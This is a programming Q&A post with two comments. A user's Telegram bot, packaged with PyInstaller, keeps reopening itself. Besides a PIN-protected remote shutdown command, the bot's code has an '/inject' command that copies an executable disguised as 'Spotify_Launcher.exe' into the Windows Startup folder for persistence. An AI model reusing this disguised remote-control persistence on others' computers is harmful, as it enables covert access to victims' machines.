# my .exe file keeps opening by itself after i run it once

Tags: python, python-3.x

i created a telegram bot in python to shut down my computer remotely, but when i convert the script to .exe using pyinstaller after i open it once it keeps opening by itself endlessly. (when i run the script using visual studio code it work fine).

there is the code.

```
import sys, subprocess, telebot, os, shutil

subprocess.check_call([sys.executable, '-m', 'pip', 'install', 
'telebot'])



API_TOKEN = 'MY_API'

bot = telebot.TeleBot(API_TOKEN)


@bot.message_handler(commands=['start'])
def send_welcome(message):
    bot.reply_to(message, """\
[] Scrivi /shutdown per spegnere il pc\
""")

@bot.message_handler(commands=['shutdown'])
def echo_message(message):
    bot.reply_to(message, """\
[] Inserire PIN per lo spegnimento:\
""")


@bot.message_handler(commands=['inject'])
def inject(message):
    start = os.getcwd()
    target = start + '/Desktop/Spotify_Launcher.exe'
    dest = f'{start}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup'
    copy(target, dest)
    bot.reply_to(message, """\
[] bot injectato\
""")


@bot.message_handler(func=lambda message: True)
def pass_message(message):
    if message.text == "MY_PASSWORD":
        bot.reply_to(message, '[] Spegnimento del pc')   
        os.system("shutdown /s /t 3")
    else:
        bot.reply_to(message, "[] Il PIN è errato, riprova")
        
bot.polling()
```

Comment: What's with the call to `pip`? If `telebot` isn't installed it will fail before it even gets there. Remove everything needless to the example. Reduce it down to the bare minimum, but still exhibit the problem. See how to create a [mcve].

Comment: You only have to install telebot once. Why do you do it from your Python code?